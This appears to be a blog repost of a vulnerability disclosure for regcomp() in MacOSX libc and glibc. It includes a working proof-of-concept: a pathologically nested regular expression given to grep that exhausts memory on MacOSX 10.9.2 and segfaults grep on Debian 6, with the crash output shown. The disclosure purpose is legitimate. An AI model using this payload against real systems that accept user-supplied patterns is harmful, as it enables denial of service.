---- 0. Where is the problem? ---- Some time ago I have reported vulnerabilities in regcomp() in BSD implementation (CVE-2011-3336) and GNU libc implementation (CVE-2010-4051 CVE-2010-4052). Now is the time for MacOSX and other software and It seems that the problem is still in their implementations.
--- MacOSX 10.9.2 libc PoC --- 0:kozak6 cx$ ls |grep -E '((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.* (.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))' grep(715,0x7fff746ed310) malloc: *** mach_vm_map(size=18446744071973109760) failed (error code=3) *** error: can't allocate region *** set a breakpoint in malloc_error_break to debug grep: out of memory --- MacOSX 10.9.2 libc PoC ---
Hmm. On debian 6, I get even worse-looking result:
pavel@amd:~$ ls |grep -E '((.*)(((((((((((((((((((((((((((((((.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}(.*){10}.*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+).*)+))'
Segmentation fault (core dumped) pavel@amd:~$ pavel@amd:~$ cat /etc/debian_version 6.0.9 pavel@amd:~$ pavel@amd:~/WWW$ uname -a Linux amd 3.15.0-rc8+ #364 SMP Sun Jun 8 13:47:52 CEST 2014 i686 GNU/Linux
Komentarų nėra:
Rašyti komentarą